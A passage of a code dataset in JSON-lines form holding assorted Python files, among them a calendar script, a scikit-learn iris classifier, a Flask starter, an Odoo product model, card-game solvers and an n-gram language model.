Input\n monthly = calendar.month( int( sys.argv[2] ), int( sys.argv[1] ), 2, 1 )\n return monthly\n\n elif input == 2 :\n #Check Format\n if not argCheck( sys.argv[1], \"2019\" ):\n return \"Please enter format MM YYYY\"\n\n # Default To This year\n year = datetime.today().year\n monthly = calendar.month( year, int( sys.argv[1] ), 2, 1 )\n return monthly\n\n else:\n # Default To Today\n year = datetime.today().year\n month = datetime.today().month\n\n monthly = calendar.month( year, month, 2, 1 )\n return monthly\n\n# Get arguments passed\nargLength = len( sys.argv )\n\nprint( generate_calendar( argLength ) )","sub_path":"src/14_cal.py","file_name":"14_cal.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"325928050","text":"import sys\nn = int(input())\nlst = list(map(int, sys.stdin.readline().split()))\n\n# 리스트에서 제일 마지막 값을 뽑는다.\n\n\ndef permutation(lst):\n temp = []\n standard = lst[-1]-1\n while lst:\n i = lst.pop()\n if standard < i:\n standard = i\n temp.append(i)\n else:\n lst.append(i)\n\n # temp에 들어있는 것 중 last 값보다는 큰 수중 가장 작은 수를 찾는다.\n # temp에 들어있는 수는 오름차순\n last = lst[-1]\n for lc, i in enumerate(temp):\n if last < i:\n lst[-1], temp[lc] = i, last\n break\n for i in temp:\n lst.append(i)\n return(lst)\n return -1\n\n\nresult = permutation(lst)\nif result == -1:\n print(result)\nelse:\n for i in result:\n print(i, end=' ')\n","sub_path":"10972.py","file_name":"10972.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"11740384","text":"import numpy as np\nimport matplotlib as mp\nimport matplotlib.pyplot as plt\nimport sklearn.neighbors as nb\nimport sklearn.metrics as metrics\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split,cross_val_score\n# 中文显示\nzhfont = mp.font_manager.FontProperties(fname=r\"C:\\\\WINDOWS\\\\Fonts\\\\simsun.ttc\", size=14) #宋体常规\n\n# 加载数据\niris = datasets.load_iris()\n\n# 构造样品数据\n\ntrain_data,test_data,train_label,test_label_expected = \\\n train_test_split(iris.data,iris.target,test_size=0.51,random_state=0)\n\n\n\n# 分析数据\n# 创建分类器\n#classifier = nb.KNeighborsClassifier(n_neighbors=3,weights='uniform',algorithm='auto')\nclassifier = nb.RadiusNeighborsClassifier(n_neighbors=2,weights='uniform',algorithm='auto')\n\n# 训练分类器\nclassifier.fit(train_data,train_label)\n\n# 预测\ntest_label_predicted = classifier.predict(test_data)\n# 交叉验证\nscores = cross_val_score(classifier,iris.data,iris.target,cv=10)\n\n# 比较结果\nsize = len(test_label_predicted)\nouter = np.zeros((size),dtype=int)\nfor i in range(size):\n if test_label_expected[i] != test_label_predicted[i]:\n outer[i] = 1\nresult = np.vstack((test_label_expected,test_label_predicted,outer))\nresult = result.T\n\n# 计算正确率\n#classifier.score(test_data,test_label_expected)\nokresult = float(np.sum(outer==0)) / len(outer)\nprint(\"Classification report for classifier %s:\\n%s\\n\" % (classifier, metrics.classification_report(test_label_expected, test_label_predicted)))\n#result = np.concatenate((test_label_expected,test_label_predicted,outer),axis=1)\n\n#绘制图形\nplt.plot(outer,'*')\nplt.xlabel(u\"样板编号\",fontproperties=zhfont)\nplt.ylabel(u'y=0 正确分类 或 y= 1 分类错误',fontproperties=zhfont)\nplt.title(u'分类正确',fontproperties=zhfont)\nplt.show()","sub_path":"working/dataAnalysisCrossValidation.py","file_name":"dataAnalysisCrossValidation.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"605592535","text":"from collections import namedtuple\n\nSTATE_PREFIX = \"java.lang.Thread.State: \"\n\nThreadInfo = namedtuple('ThreadInfo', 'frames is_edt thread_state')\nDumpFileInfo = namedtuple('DumpFileInfo', 'thread_infos')\n\n\ndef get_info(self):\n return next((i for i in self.thread_infos if i.is_edt), None)\n\n\nsetattr(DumpFileInfo, 'get_edt_info', get_info)\n\n\ndef split_into_threads(lines):\n \"\"\"\n :type lines: list(str)\n :param lines:\n :return: list(list(str))\n \"\"\"\n start_indices = [i - 1 for i, s in enumerate(lines) if STATE_PREFIX in s]\n start_indices.append(len(lines))\n if len(start_indices) < 2:\n return []\n return [lines[begin:end] for begin, end in zip(start_indices[:-1], start_indices[1:])]\n\n\ndef parse_thread_info(thread):\n \"\"\"\n :type thread: list(str)\n :param thread: processed thread\n :return: Optional(ThreadInfo)\n \"\"\"\n if len(thread) <= 3 or STATE_PREFIX not in thread[1]:\n return None\n\n is_edt = \"AWT-EventQueue\" in thread[0]\n thread_state = thread[1].strip().replace(STATE_PREFIX, \"\")\n return ThreadInfo(thread, is_edt, thread_state)\n\n\ndef parse_dump_file(lines):\n \"\"\"\n :type lines: list(str)\n :param lines:\n :return: Optional(DumpFileInfo)\n \"\"\"\n infos = [info for info in (parse_thread_info(thread) for thread in split_into_threads(lines)) if info is not None]\n return DumpFileInfo(infos) or None\n","sub_path":"dump_file.py","file_name":"dump_file.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"354741401","text":"#This Script Contains Parameter Required for Reliablity Testcase \n#List of Python Library Required\n\nimport time\nfrom datetime import *\nimport os\nimport sys\nimport logging\nimport shutil \n\n#ETC Ports\nETC_UART0 = 0\nETC_UART1 = 1\nETC_UART2 = 2\nETC_UART3 = 3\n\n#ETC UART Baud Rate\nETC_UART_BAUD = 921600\n\n#Random Burst Size Enable\nrad=False \nFETL=False\nFULL_DUPLEX = True\n\nSTC_TR_SIZE = ['1000']\nPacket_Size = ['10M','1M','100K']\n\nTPS_Voltage = [1.1,1.045,1.155]\nTemp_C= ['S25']\n\n#Voltage TPS Calculation \nTPS_Values=[]\nfor i in TPS_Voltage:\n\tTPS_Values += hex(int((i+0.60)/0.01))[2:] +'00',\n\t","sub_path":"Python_Practice/Power_On_Off/source_code/reliablity_header.py","file_name":"reliablity_header.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"268692613","text":"import matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\n\ndef f(x):\n return (x+2)*x*(x-1)\n\n\nx = np.linspace(-2.5,2.5,100,endpoint=True)\ny = f(x)\n\n\nfig, ax = plt.subplots()\n\nax.spines['left'].set_position('center')\nax.spines['bottom'].set_position('zero')\n\n# Eliminate upper and right axes\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\n\n# Show ticks in the left and lower axes only\nax.xaxis.set_ticks_position('bottom')\nax.yaxis.set_ticks_position('left')\n\n\n\n#xticks = ax.xaxis.get_major_ticks() \n#xticks[3].label1.set_visible(False)\n\nyticks = ax.yaxis.get_major_ticks() \nyticks[2].label1.set_visible(False)\n\nplt.plot(x,y, 'k')\n\nplt.plot(-1.215,2.113,'ro') \nplt.plot(0.549,-0.631,'ro') \n\n\n\nplt.savefig('cubic.png', transparent=True)\nplt.show()","sub_path":"Figure generator code/figure_min.py","file_name":"figure_min.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"442369774","text":"#!/usr/bin/env python\nimport sys\nfrom hashlib import md5\nfrom itertools import count\n\nc1 = c2 = 8\nt1 = \"\"\nt2 = [\" \"] * c2\n\nfor i in count(1):\n hash = md5((sys.argv[1] + str(i)).encode(\"ascii\")).hexdigest()\n if hash[:5] == \"00000\":\n if c1 > 0:\n c1 -= 1\n t1 += hash[5]\n\n if c2 > 0 and hash[5].isdigit():\n j = int(hash[5])\n if 0 <= j < len(t2) and t2[j] == \" \":\n c2 -= 1\n t2[j] = hash[6]\n\n if c1 <= 0 and c2 <= 0:\n break\n\nprint(t1)\nprint(\"\".join(t2))\n","sub_path":"2016/05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"234056731","text":"import time\nfrom collections import defaultdict\n\nstart_time = time.time()\n\nf = open('names_1.txt', 'r')\nnames_1 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nf = open('names_2.txt', 'r')\nnames_2 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\njoin_names = names_1 + names_2\ncache = defaultdict(int)\nduplicates = []\n\nfor name in names_1:\n cache[name] += 1\nfor name in names_2:\n if cache[name]:\n duplicates.append(name)\n\n \nend_time = time.time()\nprint (f\"{len(duplicates)} duplicates:\\n\\n{', '.join(duplicates)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")\n\n","sub_path":"names/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"481614340","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n'''\n按照扑克牌的规则,现在有6张牌,只要5张\n黑桃(S)红桃(H)方块(D)梅花(C)\n牌:2.3.4.5.6.7.8.9.10.J.Q.K.A\n数据库存的是下面格式的数据,写脚本验证满足3带2的牌型\n[''D1'' , ''H1'' , ''H10'' , ''H7'' , ''S1'' , ''S7'']\n[\"C9\" , \"D6\" , \"D9\" , \"H13\" , \"H9\" , \"S7\"]\n[\"C2\" , \"D13\" , \"D2\" , \"H2\" , \"H9\" , \"S13\"]\n'''\n# a = '''[''D1'' , ''H1'' , ''H10'' , ''H7'' , ''S1'' , ''S7'']'''\n# # #字符串的替换\n# a = a.replace(\"''\",'\"')\n# #字符串截取\n# a = a[2:-2]\n#\n# print(a)\n#\n# #字符串的切片方法\n#\n# b = a.split('\" , \"')\n#\n# print(b)\n#\n# #key 唯一;并且存一对数据\n# #key存牌的大小,value存key出现的次数\n# #{'1':3,\"10\":1,\"7\":2}\n# d={}\n# for i in b:\n# c = i[1:]\n# if(c in d ):\n# d[c] +=1\n# else:\n# d[c] =1\n# print(d)\n# bool2 = False # 字典KEY的值为2的时候为True\n# bool3 = False # 字典KEY的值为3的时候为True\n# for key in d:\n# if(d[key]==3):\n# bool3 = True\n# if(d[key]==2):\n# bool2 = True\n# if(bool2 and bool3):\n# print(\"可以三带二\")\n# else:\n# print(\"不可以\")\n# m='''[\"C9\" , \"D6\" , \"D9\" , \"H13\" , \"H9\" , \"S7\"]'''\n# m=m[2:-2]\n# c=m.split('\" , \"')\n# print(c)\n\n\n#def是方法定义的关键字,juge_3_2()方法名,可自定义不可以数字开头,\ndef juge_3_2(a):\n #第一步:统一符号 对字符串的处理,用replace()\n #a='''[''D1'' , ''H1'' , ''H10'' , ''H7'' , ''S1'' , ''S7'']'''\n #a= input(\"请输入牌型:\")\n a=a.replace(\"''\",'\"')\n #print(a)\n # 第二步:去掉中括号 字符串截取 [::]\n a=a[2:-2]\n # 第三步:变成list 字符串切片 .split() 新建一个list变量\n b=a.split('\" , \"')\n #print(b)\n # 第四步:取出后面的数字 循环遍历取出list里面的每个值,对这个值进行截取\n #for key in b:\n #print(key[1:])\n # 第五步:统计相同的数字个数 用字典去统计\n d={}\n for c in b:\n y=c[1:]\n if y in d:\n d[y] += 1\n else:\n d[y] =1\n print(d)\n # 第六步:判断数据中有没有同时存在三��相同数字和两个相同数字 if判断\n m1=0#字典KEY的值为2的时候为1\n m2=0#字典KEY的值为3的时候为1\n for key in d:\n if(d[key] == 2):\n m1=1\n if(d[key] == 3):\n m2=1\n if(m1==1 and m2==1):\n print(\"3带2\")\n else:\n print(\"不可3带2\")\n\n\n# for i in range(3):\n# juge_3_2(i)\n# with open(\"D:\\\\software data\\\\pycharm\\\\gy-1906-1\\\\demo\\\\day04\\\\cards.txt\",'r') as h:\n# x=h.readlines()\n# for e in x:\n# e=e.replace(\"\\n\",'')\n# print(e)\n# juge_3_2(e)\n#\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nwith open(\"cards.txt\",'r')as m:\n line=m.readlines()\n for lines in line:\n lines=lines.replace(\"\\n\",'')\n print(lines)\n juge_3_2(lines)\n","sub_path":"demo/day04/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"622989046","text":"def num_common_letters(goal_word, guess):\n goal = get_string(goal_word)\n guess = get_string(guess)\n k = 0\n for i in range(len(guess)):\n if guess[i] in goal:\n if i == 0:\n k += 1\n elif guess[i] not in guess[0:i]:\n k += 1\n else:\n k = k\n return k\n","sub_path":"assignments/python/61a_hw4/code/39.py","file_name":"39.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"496708485","text":"from flask import Flask, render_template, jsonify\nimport database\n\napp = Flask(__name__)\n\n\n@app.route('/status', methods=['GET'])\ndef status():\n try:\n import database\n database.test()\n return jsonify(status='Success')\n except Exception as e:\n return jsonify(status='Failed', error=str(e))\n\n\n@app.route(\"/\", defaults={\"path\": \"\"})\n@app.route(\"/\")\ndef index(path):\n return render_template('index.html')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"webapp-quickbuild/builder/starter/flask/flask_starter.py","file_name":"flask_starter.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"371482042","text":"\"\"\"\n\n\"\"\"\nimport astropy.units as u\nimport numpy as np\nimport h5py\n\n# FOXSI-R Constants\nFOCAL_LENGTH = 2 * u.m\nPIXEL_NUMBER = 128\nSTRIP_PITCH = {'cdte': 60 * u.micron, 'si': 75 * u.micron}\n\n# CCD Parameters\nCCD_PIXEL_PITCH = 13.5 * u.micron\n\nHDF_CCD_FILE = '/Users/schriste/Documents/FOXSI-R/Optics PSF Calibration/foxsi2_ccd_corrected.hdf5'\n\nprint(\"Loading file {0}\".format(HDF_CCD_FILE))\nhdf_ccd = h5py.File(HDF_CCD_FILE, 'r+')\nccd_images = hdf_ccd['X2/ccd_images']\nccd_polar_angles = u.Quantity(hdf_ccd['meta/polar_angle'][...], hdf_ccd['meta/polar_angle'].attrs['units'])\nccd_offaxis_angles = u.Quantity(hdf_ccd['meta/offaxis_angle'][...], hdf_ccd['meta/offaxis_angle'].attrs['units'])\nccd_nimages = ccd_images.shape[0]\n\n\n@u.quantity_input(pixel_pitch=u.mm)\ndef plate_scale(pixel_pitch):\n \"\"\"Given a pixel pitch provide the plate scale.\"\"\"\n return np.arctan(pixel_pitch / FOCAL_LENGTH).to(u.arcsec)","sub_path":"foxsi_optics_calib/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"410917381","text":"from PyQt5.QtWidgets import QApplication, QDialog, QPushButton, QHBoxLayout, QGroupBox, QVBoxLayout\nimport sys\nfrom PyQt5 import QtGui\nfrom PyQt5.QtCore import QRect\nfrom PyQt5 import QtCore\n\n\nclass Window(QDialog):\n def __init__(self):\n super().__init__()\n\n self.title = \"HBox Layout\"\n self.top = 200\n self.left = 400\n self.width = 400\n self.height = 100\n self.iconName = \"icon.png\"\n\n self.InitWindow()\n\n def InitWindow(self):\n self.setWindowIcon(QtGui.QIcon(self.iconName))\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n\n self.CreateLayout()\n\n vbox = QVBoxLayout()\n vbox.addWidget(self.groupBox)\n self.setLayout(vbox)\n\n self.show()\n\n def CreateLayout(self):\n self.groupBox = QGroupBox(\"What Is Your Favorite Programming Language ?\")\n hboxLayout = QHBoxLayout()\n\n self.button = QPushButton(\"Football\", self)\n self.button.setIcon(QtGui.QIcon(\"football.png\"))\n self.button.setIconSize(QtCore.QSize(40, 40))\n self.button.setMinimumHeight(40)\n hboxLayout.addWidget(self.button)\n\n self.button2 = QPushButton(\"Cricket\", self)\n self.button2.setIcon(QtGui.QIcon(\"cricket.png\"))\n self.button2.setIconSize(QtCore.QSize(40, 40))\n self.button2.setMinimumHeight(40)\n hboxLayout.addWidget(self.button2)\n\n self.button3 = QPushButton(\"Tennis\", self)\n self.button3.setIcon(QtGui.QIcon(\"tennis.png\"))\n self.button3.setIconSize(QtCore.QSize(40, 40))\n self.button3.setMinimumHeight(40)\n hboxLayout.addWidget(self.button3)\n\n self.groupBox.setLayout(hboxLayout)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = Window()\n sys.exit(app.exec())\n","sub_path":"Examples/VHLayout.py","file_name":"VHLayout.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"330992040","text":"\"\"\"\nThis module contains the declaration of variables for different HTTP status\ncodes that neither Flask nor Flask-RESTful includes.\n\nThis module will help in the readability of the code as contains a descriptive\nHTTP status codes.\n\"\"\"\nfrom enum import Enum\n\nclass HttpStatus(Enum):\n \"\"\"Represents different and unique sets of HTTP status codes\n names and values.\"\"\"\n continue_100 = 100\n switching_protocols_101 = 101\n ok_200 = 200\n created_201 = 201\n accepted_202 = 202\n non_authoritative_information_203 = 203\n no_content_204 = 204\n reset_content_205 = 205\n partial_content_206 = 206\n multiple_choices_300 = 300\n moved_permanently_301 = 301\n found_302 = 302\n see_other_303 = 303\n not_modified_304 = 304\n use_proxy_305 = 305\n reserved_306 = 306\n temporary_redirect_307 = 307\n bad_request_400 = 400\n unauthorized_401 = 401\n payment_required_402 = 402\n forbidden_403 = 403\n not_found_404 = 404\n method_not_allowed_405 = 405\n not_acceptable_406 = 406\n proxy_authentication_required_407 = 407\n request_timetout_408 = 408\n conflict_409 = 409\n gone_410 = 410\n length_required_411 = 411\n precondition_failed_412 = 412\n request_entity_too_large_413 = 413\n request_uri_too_long_414 = 414\n unsupported_media_type_415 = 415\n requested_range_not_satisfiable_416 = 416\n expectation_failed_417 = 417\n precondition_required_428 = 428\n too_many_requests_429 = 429\n request_header_fields_too_large_431 = 431\n unavailable_for_legal_reasons_451 = 451\n internal_server_error_500 = 500\n not_implemented_501 = 501\n bad_gateway_502 = 502\n service_unavailable_503 = 503\n gateway_timeout_504 = 504\n http_version_not_supported_505 = 505\n network_authentication_required_511 = 511\n\n @staticmethod\n def is_informational(cls, status_code):\n return 100 <= status_code.value <= 199\n\n @staticmethod\n def is_success(status_code):\n return 200 <= status_code.value <= 299\n\n @staticmethod\n def is_redirect(status_code):\n return 300 <= status_code.value <= 399\n\n @staticmethod\n def is_client_error(status_code):\n return 400 <= status_code.value <= 499\n\n @staticmethod\n def is_server_error(status_code):\n return 500 <= status_code.value <= 599\n","sub_path":"simple-in-memory-dictionary-data-source/service/http_status.py","file_name":"http_status.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"176096436","text":"from fileinput import input as finput\nfrom collections import deque\nfrom itertools import islice\n\ndef parse(deck):\n q = deque()\n for line in deck.splitlines():\n try:\n i = int(line)\n q.append(int(line))\n except:\n k = line[:-1] \n return k, q\n\nfi = \"\".join(finput())\ndecks = dict([parse(deck) for deck in fi.split(\"\\n\\n\")])\n\ndef combat(decks):\n p1 = decks[\"Player 1\"]\n p2 = decks[\"Player 2\"]\n while p1 and p2:\n p1c = p1.popleft() \n p2c = p2.popleft()\n if p1c > p2c:\n p1.append(p1c) \n p1.append(p2c)\n else:\n p2.append(p2c)\n p2.append(p1c)\n return (\"Player 1\", p1) if p1 else (\"Player 2\", p2)\n\ndef score(deck):\n s = 0\n for i, n in enumerate(reversed(deck), 1):\n s += n * i\n return s\n\ndef part1(decks):\n _, deck = combat(decks)\n return score(deck)\n\ndef tuplify(p1, p2):\n return tuple(p1) + (\"_\",) + tuple(p2)\n\ndef qslice(q, start, end):\n return deque(islice(q, start, end))\n\ndef recursive_combat(p1, p2):\n used = set()\n while p1 and p2:\n t = tuplify(p1, p2)\n if t in used:\n return 1, p1\n used.add(t)\n p1c = p1.popleft()\n p2c = p2.popleft()\n if len(p1) >= p1c and len(p2) >= p2c:\n p1s = qslice(p1, 0, p1c)\n p2s = qslice(p2, 0, p2c)\n winner, _ = recursive_combat(p1s, p2s)\n else:\n winner = 1 if p1c > p2c else 2 \n if winner == 1: \n p1.append(p1c)\n p1.append(p2c)\n else:\n p2.append(p2c)\n p2.append(p1c)\n if len(p1) > 0:\n return 1, p1\n return 2, p2\n \ndef part2(decks):\n p1 = decks[\"Player 1\"]\n p2 = decks[\"Player 2\"]\n _, deck = recursive_combat(p1, p2)\n return score(deck)\n\n\n\n","sub_path":"22/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"583377487","text":"from odoo import api, fields, models\nfrom odoo.addons import decimal_precision as dp\n\n\nclass ProductProduct(models.Model):\n _inherit = 'product.product'\n\n option = fields.Float(string=\"Option\")\n moh = fields.Float(string=\"MOH(%)\")\n boh = fields.Float(string=\"BOH(%)\")\n # product_file = fields.Binary()\n # product_doc = fields.Binary(string=\"Product Document\",attachment=True,store=True)\n # filename = fields.Char(\"filename\",store=True)\n # presale_ids = fields.Many2many('res.users', 'presale_user', 'order_id', 'user_id', string='PreSales',domain=lambda self:self._display_presale_saleorder())\n lst_price = fields.Float(\n 'Sale Price', compute='_compute_product_lst_price',default=1.0,\n digits=dp.get_precision('Product Price'), inverse='_set_product_lst_price',\n help=\"The sale price is managed from the product template. Click on the 'Variant Prices' button to set the extra attribute prices.\")\n\n\nclass ProductTemplate(models.Model):\n _inherit = \"product.template\"\n product_file = fields.Binary(string=\"Upload Product File\")\n filename = fields.Char(\"filename\",store=True)\n qbom_ids = fields.One2many('quotation.bom', 'product_tmpl_id')\n option = fields.Float(\n string=\"Option\", compute=\"_compute_option\", store=True, readonly=False)\n moh = fields.Float(string=\"MOH(%)\", compute=\"_compute_moh\",\n store=True, readonly=False)\n boh = fields.Float(string=\"BOH(%)\", compute=\"_compute_boh\",\n store=True, readonly=False)\n product_doc = fields.Binary(string=\"Product Document\",attachment=True)\n filename = fields.Char(\"filename\")\n product_label = fields.Many2many('product.label','product_label_rel','product_id','label_id',string=\"Labels\")\n type = fields.Selection(selection_add=[('product', 'Stockable Product')],default='product')\n @api.depends('product_variant_ids', 'product_variant_ids.boh')\n def _compute_boh(self):\n unique_variants = self.filtered(\n lambda template: len(template.product_variant_ids) == 1)\n for template in unique_variants:\n template.boh = template.product_variant_ids.boh\n for template in (self - unique_variants):\n template.boh = 0.0\n\n @api.depends('product_variant_ids', 'product_variant_ids.moh')\n def _compute_moh(self):\n unique_variants = self.filtered(\n lambda template: len(template.product_variant_ids) == 1)\n for template in unique_variants:\n template.moh = template.product_variant_ids.moh\n for template in (self - unique_variants):\n template.moh = 0.0\n\n @api.depends('product_variant_ids', 'product_variant_ids.option')\n def _compute_option(self):\n unique_variants = self.filtered(\n lambda template: len(template.product_variant_ids) == 1)\n for template in unique_variants:\n template.option = template.product_variant_ids.option\n for template in (self - unique_variants):\n template.option = 0.0\n","sub_path":"quotation_bom/models/product_product.py","file_name":"product_product.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"425605666","text":"# Load required libraries\nimport matplotlib as plt\nplt.use('Agg')\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nfrom sklearn.externals import joblib\nimport pandas as pd\nimport numpy as np\n\n# Set figure display options\nsns.set(context='notebook', style='darkgrid')\nsns.set(font_scale=1.4)\n\ndef construct_graph(scaled_meta_features, coefficients, top_project_std):\n \"\"\"Constructs and saves a plot displaying the weighted scores of the user's\n project compared to the weighted scores of the average project from the top\n 5% of projects\n \n Args:\n scaled_meta_features (ndarray): a NumPy array containing the values of the\n 19 meta features standardized by the scaler trained on the training\n set\n feature_ranks (ndarray): a NumPy array containing the weights of the \n trained model\n top_project_std (ndarray): a NumPy array containing the values of the 19\n features from the average project from the top 5%, standardized by the\n scaler trained on the training set\n \n Returns:\n Nothing\"\"\"\n\n # List of meta features\n features = ['num_sents', 'num_words', 'num_all_caps', 'percent_all_caps',\n 'num_exclms', 'percent_exclms', 'num_apple_words',\n 'percent_apple_words', 'avg_words_per_sent', 'num_paragraphs',\n 'avg_sents_per_paragraph', 'avg_words_per_paragraph',\n 'num_images', 'num_videos', 'num_youtubes', 'num_gifs',\n 'num_hyperlinks', 'num_bolded', 'percent_bolded']\n \n # Compute feature importances of the meta features\n feature_ranks = pd.Series(\n coefficients[:len(features)],\n index=features\n )\n \n # List of meta features that were most predictive of funded projects\n predictive_features = ['num_hyperlinks', 'num_images', 'num_apple_words',\n 'num_exclms', 'percent_bolded', 'num_words']\n\n # Transform the standardized feature vector into a Series\n feature_vector_std = pd.Series(scaled_meta_features.ravel(), index=features)\n\n # Compute the weighted score of the meta features of the user's project\n user_project_score = np.multiply(\n feature_vector_std[predictive_features],\n feature_ranks[predictive_features]\n )\n\n # Compute the weighted score of the meta features of the average top project\n top_project_score = np.multiply(\n top_project_std[predictive_features],\n feature_ranks[predictive_features]\n )\n\n # Combine the weighted score into a single DataFrame\n messy = pd.DataFrame(\n [user_project_score, top_project_score], \n index=['Your project', 'Top projects']\n ).T.reset_index()\n\n # Transform the combined data into tidy format\n tidy = pd.melt(\n messy,\n id_vars='index',\n value_vars=['Your project', 'Top projects'],\n var_name=' '\n )\n\n # Draw a grouped bar plot of the weighted scores, and remove axes labels and \n # x-axis tick marks\n fig = sns.factorplot(\n data=tidy,\n y='index',\n x='value',\n hue=' ',\n kind='bar',\n size=5,\n aspect=1.5,\n palette='Set1',\n legend_out=False\n ).set(\n xlabel='score',\n ylabel='',\n xticks=[]\n )\n\n # Re-label the y-axis and re-position legend\n labels = ['hyperlinks', 'images', 'innovation words', 'exclamation marks',\n 'bolded text', 'length of description']\n plt.yticks(np.arange(6), labels)\n fig.ax.legend(loc='lower right')\n\n # Save the figure\n plt.savefig(\n 'flaskexample/static/images/figure.png',\n dpi=300,\n bbox_inches='tight'\n );","sub_path":"application/prediction_results.py","file_name":"prediction_results.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"616415358","text":"from creative_ai.utils.print_helpers import ppGramJson\n\nclass QuadgramModel():\n\n def __init__(self):\n \"\"\"\n Requires: nothing\n Modifies: self (this instance of the NGramModel object)\n Effects: This is the NGramModel constructor. It sets up an empty\n dictionary as a member variable.\n\n This function is done for you.\n \"\"\"\n\n self.nGramCounts = {}\n\n def __str__(self):\n \"\"\"\n Requires: nothing\n Modifies: nothing\n Effects: Returns the string to print when you call print on an\n NGramModel object. This string will be formatted in JSON\n and display the currently trained dataset.\n\n This function is done for you.\n \"\"\"\n\n return ppGramJson(self.nGramCounts)\n\n\n###############################################################################\n# Begin Core >> FOR CORE IMPLEMENTION, DO NOT EDIT ABOVE OF THIS SECTION <<\n###############################################################################\n\n def trainModel(self, text):\n \"\"\"\n Requires: text is a list of lists of strings\n Modifies: self.nGramCounts, a three-dimensional dictionary. For\n examples and pictures of the TrigramModel's version of\n self.nGramCounts, see the spec.\n Effects: this function populates the self.nGramCounts dictionary,\n which has strings as keys and dictionaries as values,\n where those inner dictionaries have strings as keys\n and dictionaries of {string: integer} pairs as values.\n Returns self.nGramCounts\n \"\"\"\n # Iterates through each sentence in text\n for list in text:\n # Iterates through each word other than last three\n for i in range(len(list) - 3):\n # Updates trigram model\n if list[i] in self.nGramCounts:\n if list[i + 1] in self.nGramCounts[list[i]]:\n if list[i + 2] in self.nGramCounts[list[i]][list[i + 1]]:\n if list[i + 3] in self.nGramCounts[list[i]][list[i + 1]][list[i + 2]]:\n self.nGramCounts[list[i]][list[i + 1]][list[i + 2]][list[i + 3]] += 1\n else:\n self.nGramCounts[list[i]][list[i + 1]][list[i + 2]][list[i + 3]] = 1\n else:\n self.nGramCounts[list[i]][list[i + 1]][list[i + 2]] = {list[i + 3] : 1}\n else:\n self.nGramCounts[list[i]][list[i + 1]] = {list[i + 2] : {list[i + 3] : 1}}\n else:\n self.nGramCounts[list[i]] = {list[i + 1]: {list[i + 2] : {list[i + 3] : 1}}}\n\n return self.nGramCounts\n\n def trainingDataHasNGram(self, sentence):\n \"\"\"\n Requires: sentence is a list of strings\n Modifies: nothing\n Effects: returns True if this n-gram model can be used to choose\n the next token for the sentence. For explanations of how this\n is determined for the TrigramModel, see the spec.\n \"\"\"\n # Checks if sentence consists of 3 or more words\n if len(sentence) > 2:\n # Returns true if last two words in the start of a trigram\n if sentence[-3] in self.nGramCounts:\n if sentence[-2] in self.nGramCounts[sentence[-3]]:\n if sentence[-1] in self.nGramCounts[sentence[-3]][sentence[-2]]:\n return True\n return False\n\n\n def getCandidateDictionary(self, sentence):\n \"\"\"\n Requires: sentence is a list of strings, and trainingDataHasNGram\n has returned True for this particular language model\n Modifies: nothing\n Effects: returns the dictionary of candidate next words to be added\n to the current sentence. For details on which words the\n TrigramModel sees as candidates, see the spec.\n \"\"\"\n # Returns dict of candidate trigrams\n return self.nGramCounts[sentence[-3]][sentence[-2]][sentence[-1]]\n\n###############################################################################\n# End Core\n###############################################################################\n\n###############################################################################\n# Main\n###############################################################################\n\nif __name__ == '__main__':\n # An example trainModel test case\n uni = QuadgramModel()\n\n text1 = [ ['the', 'brown', 